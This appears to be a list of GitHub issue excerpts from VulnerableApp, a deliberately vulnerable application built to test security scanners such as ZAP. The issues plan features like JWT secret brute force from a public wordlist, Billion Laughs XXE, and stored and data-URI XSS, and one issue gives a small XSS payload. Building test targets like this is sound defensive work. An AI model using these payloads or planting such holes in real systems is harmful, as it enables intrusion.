Karan Preet Singh Sasan
Karan Preet Singh Sasan
**Is your feature request related to a problem? Please describe.** Analyse the brute force attack with common passwords for jwt as per the following https://raw.githubusercontent.com/wallarm/jwt-secrets/master/jwt.secrets.list list. Read more on https://lab.wallarm.com/meet-jwt-heartbreaker-a-burp-extension-that-finds-thousands-weak-secrets-automatically/...
**Is your feature request related to a problem? Please describe.** Currently we are not having any Unit tests and hence regression is quite tough to handle. This task is an...
**Is your feature request related to a problem? Please describe.** As we have Owasp JuiceShop having how i pwned the juice shop similarly it is better if we have similar...
for now we have supported standalone vulnerabilities but when it comes to vulnerabilities like Session fixation, CSRF etc we need to think more on how can we introduce them in...
**Describe the bug** Validate Billion Laugh attack for [XXE vulnerability](https://github.com/SasanLabs/VulnerableApp/blob/master/src/main/java/org/sasanlabs/service/vulnerability/xxe/XXEVulnerability.java). There is some level that can have billion laugh attack but we have not tested it. There is a default...
**Is your feature request related to a problem? Please describe.** Current implementation of ZAP and VulnerableApp integration has few issues related to scoring due to different designs of both the...
While going through vulnerability descriptions, found that they are not proper and needs a revisit. Need to separate out where the value was found ie cookie or url or other...
**Is your feature request related to a problem? Please describe.** Adding Data uri based xss e.g. data:text/html,alert('hi'); **Describe the solution you'd like** As XSS vulnerability is already there. it would...
**Is your feature request related to a problem? Please describe.** Currently we have added XSS but that is only the usecase of Reflected XSS but there is no Persistent XSS...
**Is your feature request related to a problem? Please describe.** There is one usecase we got from the https://github.com/zaproxy/zap-extensions/pull/2443 where untrusted input is part of Path Param so we need...